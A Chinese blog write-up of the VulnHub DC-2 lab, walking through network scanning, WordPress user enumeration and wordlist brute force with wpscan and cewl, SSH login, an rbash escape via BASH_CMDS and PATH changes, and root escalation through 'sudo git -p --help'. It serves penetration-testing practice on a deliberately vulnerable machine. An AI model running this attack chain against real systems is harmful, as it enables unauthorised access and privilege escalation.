vulnhub--DC2

已于 2022-05-14 16:03:01 修改
阅读量1.4k 收藏 8
点赞数 3
CC 4.0 BY-SA版权
文章标签: 安全 web安全
于 2022-05-12 20:18:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55129870/article/details/124734742

环境:kali、DC2靶机

DC2靶机默认桥接模式,开启前改成net模式,保证kali和DC2在同一局域网中。(也可都是桥接模式,我比较习惯net模式)

ifconfig查看kaliIP地址:192.168.44.131

2b840a57bb534485aa1d91746bd97db9.png

查看C段,准备C段扫描,在虚拟机编辑--虚拟网络编辑器中,

b711d58d60ec4efeb4a8cc89d2975258.png

得知网段192.168.44.0/24,使用nmap扫描存活主机

nmap -sP 192.168.44.0/24    #扫描IP段的所有IP地址

38c8f08ba6da4753bd8450572c7ba329.png

 一般都会扫描出5个存活主机,出去较大的,较小的,得知DC2的IP为192.168.44.142(或者还有一种方法判断192.168.44.142就是DC2主机IP,就是把DC2关机扫描一次,开机扫描一次)

端口扫描,

nmap -A -p1-65535 -T4 192.168.44.142     #扫描开放端口及对应服务

7229fe5a699a488ab43930c6f03ba6a6.png

 开放了80和7744端口,分别对应http服务和ssh服务。

既然开放80端口,直接访问http服务。直接在地址栏输入IP地址即可,

输入访问ip,发现无法访问返回到dc-2路径,需要修改/etc/host文件

6ff063e84b784168a69077f22bf5ea6d.png

 进入/etc目录,vim打开hosts文件,添加 192.168.44.142   dc-2.保存退出

33a302ccbb72492ab5aff7d9783739bd.png

 2071d8681ccb45599ee244ad1d163131.png

再次访问web服务,即可成功访问,并且看到cms是wordpress(WordPress是一种使用PHP语言和MySQL数据库开发的博客平台

4bbb91f76a544de99e49e5c866956407.png

 点击flag,出现提示

3fabc8bc1a2a443381928a8c90ee123e.png

 

看不懂,翻译

2bba8ce8e483424494522a92ffd0d841.png

 提示用cewl工具破解密码,登陆后才可以查看下一个flag

(Cewl是一款采用Ruby开发的应用程序,可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,然后可以用于密码破解。)

既然需要登录,使用dirb扫描网站目录,寻找可登录网站

c8484ff6cd804fd28f30a13094761650.png

看到wp-admin,访问

538e5835df2c415f98a1aabf9571d01a.png 

成功访问,看到登录界面,前面又提示需要cwel(cwel生成的字典是用来爆破密码的),尝试用户枚举,然后利用枚举到的用户爆破密码

wpscan --url http://dc-2/wp-admin/ -e u

f327aa1c0e4446e4afb80c0e9117a871.png

 

5063d1a63ce546d090b9ccf7a22d949f.png

wpscan --url http://dc-2/wp-admin/ -e u这个命令可以爆出3个用户名,

  1. admin

  2. tom

  3. jerry

(如果wpscan运行时报错,

Unable to get https://data.wpscan.org/metadata.json.sha512 ......等等报错,大概意思呢就是访问不到这个更新源;网上很多教程,大概意思就是下载最新压缩包,放到本地更新。我是直接换了一个kali源,既然找不到更新源,就换掉用其他的。kali源网上很多,我换了阿里云的就能正常更新了。)

接着使用cewl生成与url相关的密码,

vim user.txt   #先把用户名放到一个txt中

cewl http://dc-2/ -w passwd.txt     #生成字典

3b6ca5c3965b48c4a10d09d0ddbb833b.png

 用wpscan进行爆破密码。需要两个文件,一个user.txt–内容就是3个用户名。一个是cewl生成的字典文件passwd.txt。

wpscan --url http://dc-2 -U user.txt -P passwd.txt  #爆破密码

651fb45099ec417da035f2594470659b.png

这里只爆破出两个,admin没有爆出。

 5d9abd8ac3e945aeb7e69b5eddb6cdb5.png

 用户名密码都拿到手,登录后台,

3ae21cc2a7b2434485d57b45db5c5140.png

 成功进入,随便点点,

8c5016f80dc24a1ebaf9f2204573f277.png

 这里看到flag2,提示出现,还是看不懂,

4451b121c68145dd9ff9a37fe4a20d46.png

 百度翻译

09a1c92bcaf6477d9bb405b6be6001b8.png

 提示说如果不能利用wordpress,也就是80端口,web服务,还有另外一种方法,前面端口扫描时,扫出来了两个服务,另一个是7744端口,ssh服务。尝试连接吧

ssh tom@192.168.44,142 -p 7744

ec0b68be166f4078a06939a76312b055.png

jerry不能登录,但是tom登录上了,ls一下,直接看到flag3.txt,想都不用想,直接cat,结果,它早有预防,tom登录后rbash限制,各种命令执行不通,但是vi可以用,

3d7412d43db24b2eb137ad28325df8d0.png

但是vi可以用,

 174b57c307fb4d90a352612e103e22f3.png

 继续百度翻译

78d6a16d44244ae09db20b57485d3a0d.png

 什么意思,百度说是要切换用户的意思,

fb9c7a26d212415994d108aa17b93ef7.png

 rbash是Restricted Shell,即受限的shell,它与一般标准shell的区别在于会限制执行一些行为。
怎么做可以绕过shell限制?

tom@DC-2:~$ su jerry
-rbash: su: command not found
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin
tom@DC-2:~$ su jerry
Password: 
jerry@DC-2:/home/tom$

 什么意思,我不知道,反正是切换成功了,不知道的交给百度吧

 切换用户后,在jerry的家目录看到flag4.txt

48345c96bff84939aec9c9b855d966f2.png

88e5202ddcec4d4293c2e11558c37a10.png

 终于,剩最后一个了,

flag4提示可以用git,使用git提权,sudo -l看到不需要root权限。

2d3a78d3658243269978820dd0fa4b99.png 

利用SUID进行提权,SUID可以让调用者以文件拥有者的身份运行该文件

已知可用来提权的linux文件: Nmap Vim find Bash More Less Nano

查找系统上运行的所有SUID可执行文件

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;
(可不输这几条)
输入sudo git -p –help

a667e5ebc403493b88d2f18f690c364d.png

 

 输入!/bin/bash 获得root权限,在roo目录下找到最终flag。

658fcde4284746b886e6ff93d922a471.png

 

 

玩转靶机VulnhubDC2(详细)
weixin_51566481的博客
07-26 1282
dc2,suid提权,rbash逃逸
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 718
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
Vulnhub DC2
qq_45746876的博客
08-13 441
Vulnhub DC2靶机学习
VulnHubDC-2
qq_45434762的博客
03-22 440
一个粗糙的端口扫描通过对目标主机进行端口探测,发现只开放了80端口,那就先访问一下看当我们通过IP访问的时候,会自动跳转成 http://dc-2我们需要在/etc/hosts 文件中...
vulhub之DC-2
crowsec
11-03 373
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01 靶机信息 https://www.vulnhub.com/?q=dc-2 Name: DC: 2 Date release: 22 Mar 2019 Author: DCAU Series: DC Web page: http://www.five86.com/dc-2.html 靶机描述: DESCRIPTIONMuch like DC-1, DC-2 is another purposely built vulnerable .
VulnHub DC2
baynk的博客
05-16 552
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-2,311/ 下载地址2:https://pan.baidu.com/s/1dTGGz47-hPiGyPyOlmvRqQ 提取码: deyr 还是一样,有5个flag,不过最重要的就是final flag,只要拿到这个就行了。 开肝。 0x02 渗透流程 flag1 nmap走起 地址比较少,很快能确定,接着看端口信息。 常用端口就开放了一个80,先弄着。 登陆后,发现服务器未找到,且IP地址变成了
靶机实操:vulnhub-DC2
不想当脚本小子的脚本小子
12-01 330
最近练手的就用vulnhub上面的靶机来玩一玩,一来可以锻炼自己的能力,二来可以举一反三,培养自己的思路,在这里我奉劝各位初学者,一定要动手实操,只有在做的过程中才能够记住你所学的东西。话不多说,今天先来DC2.我这里主要是分享我的一些实验过程以及自己的思路与总结。 首先境安装好以后先哐哐哐各来一通: 开放了80,7744端口,对这个7744端口还挺有兴趣,一会看看有没有什么能够自己操作的地方 wapplyzer是一款火狐插件,亲测好用,发现了wordpress,这个时候就想着一会...
靶机渗透-Vulnhub-DC-2
dahege666的博客
01-21 429
下载地址: 1、链接:https://pan.baidu.com/s/1cl5-9SrevaFehfS4lY4w5w 提取码:7ahw 2、http://www.five86.com/downloads/DC-2.zip 3、https://download.vulnhub.com/dc/DC-2.zip 靶机:DC2(VMware桥接) IP:192.168.88.123 攻击机:Kali(VMware桥接) IP:192.168..88.109 测试之前需要修改一下hos...
Vulnhub-DC-2靶场渗透练习
weixin_52451257的博客
11-13 3710
Vulbhub-DC2 靶场地址:DC: 2 ~ VulnHub 根据提示 需要把靶机的IP和 域名绑定 修改hosts文件 Vi /etc/hosts 靶机ip dc-2 第一步:信息收集 nmap –sS 192.168.231.0/24 nmap -A -p- 192.168.231.140 扫描目录信息, 扫描目录目前掌握 dirb,nikto,dirmap,dirsearch dirb http://192.168.231.140 nikto -h htt...
vulnhub通关-2 DC-2(含靶场资源)
最新发布
Brucye
02-01 1408
WPScan是一个开源的网络安全工具,专门用于发现WordPress网站中的安全漏洞。BASH_CMD通常不是一个标准的环境变量。不过,如果你在某些脚本或配置文件中看到BASH_CMD,它可能是一个自定义的环境变量用于存储一个bash命令或者命令的路径。这个变量的具体含义和用途取决于它在脚本或配置中的上下文。命令解释:export 用于添加环境变量,su在/bin目录下,所以添加/bin目录。
[Vulnhub] DC-2
weixin_63231007的博客
01-02 716
DC系列靶机-第二弹(hydra爆破+rbash逃逸+git提权)
Vulnhub-dc2学习笔记
weixin_42820274的博客
01-18 1076
Vulnhub-dc2学习笔记1.NMAP扫描子网2.改hosts文件访问80端口http2.1使用cewl获取密码字典2.2使用WPscan获取用户名2.3 使用wpscan爆破密码2.4 按照提示登录获取下一个线索3.尝试使用用户名密码ssh登录4.Git提权 1.NMAP扫描子网 发现靶机IP,有80端口,ssh端口改成了7744 2.改hosts文件访问80端口http 打开web页面发...
vulnhubDC2靶机
LainWith的博客
08-16 1562
靶机概览信息收集nmap信息收集网站信息收集Flag1爬站目录扫描列出站点的用户名、账号渗透攻击爆破后台访问网站Flag2爆破ssh登录ssh绕过rbash拿flag3拿下jerry拿下flag4提权git提权flag5 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机.
Vulnhub系列】DC2
大方子
04-08 5257
文章目录基本信息实验过程额外内容rbash另一种绕过方式另一种查看当前用户可用命令方式 靶机下载地址:https://www.five86.com/downloads/DC-2.zip 基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.168.61.1/24 排查筛选得知,192.168.61.162DC2的IP地址 接下来用Nmap对DC2进行端口扫描 n
Vulnhub dc-2靶机 详解 易懂
Lee_yc的博客
08-21 668
​ 下载地址:DC: 2 ~ VulnHub 下载完成后直接使用虚拟机打开就可以了,注意把靶机设置为NAT模式
vulnhubDC2
qq_54030686的博客
05-31 285
简述:各位兄弟可移步至https://blog.csdn.net/shuteer_xu/article/details/116141639,直接看这位师傅的即可,本人只当成一个笔记 老三样,主机发现,端口扫描,指纹识别 主机发现 nmap -sS 192.168.43.0/24 全端口扫描 nmap -A -p- 192.168.43.130 共发现 7744为ssh端口处于开放状态,使用hydra进行爆破,使用 hydra -L /opt/user.txt -P /opt/mima.txt ss
Vulnhub DC-2
Pai_Space
01-29 744
首先明确:《中华人民共和国网络安全法》 Description Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it's designed with beginners in mind. Linux skills an.
Vulnhub系列:DC-2
weixin_41064688的博客
01-10 433
Vulnhub系列:DC-2 环境准备: DC-2靶机 Kali linux Vmware或vm box 工具: nmap, wpscan cewl 流程: Nmap进行信息收集 进入页面发现是WordPress,寻找漏洞利用,但需要密码,找到flag1 Cewl生成密码字典 WordPress可以用wpscan扫出安全漏洞数量和用户名加爆破密码 登录网站,找到flag2 然后就通过ssh连接,找...
cbm-dc2 超声波程序
10-14
CBM-DC2超声波程序是一种基于超声波技术的测量程序。CBM是嵌入式系统名称,DC2则表示第二代设备。该程序主要应用于测量距离、检测物体的位置、识别物体的形状等方面。 CBM-DC2超声波程序的工作原理是通过超声波发射器发射超声波信号,然后接收器接收到被物体反射后的声波信号。通过计算发射与接收之间的时间差,并结合声速的知识,可以准确地测量出被测物体与传感器之间的距离。这种测量方法具有非接触、快速、准确等优点,因此广泛应用于各个领域。 CBM-DC2超声波程序可以用于测量物体的距离。通过将传感器安装在测量物体附近,即可实时测量物体与传感器之间的距离。比如在机械领域中,可以用来检测机械设备中零件的位置和间距,以及机器人中的障碍物位置,可广泛应用于自动化生产线中。 此外,CBM-DC2超声波程序还可以用于检测物体的位置。通过分析声波信号的强弱或回波的时间差,可以确定物体在空间中的位置。这在自动驾驶领域中具有重要意义,可以用于检测周围车辆、行人或其他障碍物的位置和距离,以保证交通安全。 最后,CBM-DC2超声波程序还能用于识别物体的形状。通过分析声波信号的回波,可以获得物体的轮廓和形状信息。这在制造业中具有广泛的应用,可以用于产品检测、零件测量等,以提高生产效率和质量管理水平。 总之,CBM-DC2超声波程序是一种基于超声波技术的测量程序,可以应用于测量距离、检测物体位置和识别物体形状等多个领域,具有非接触、快速、准确等优点,在各个领域中发挥着重要作用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值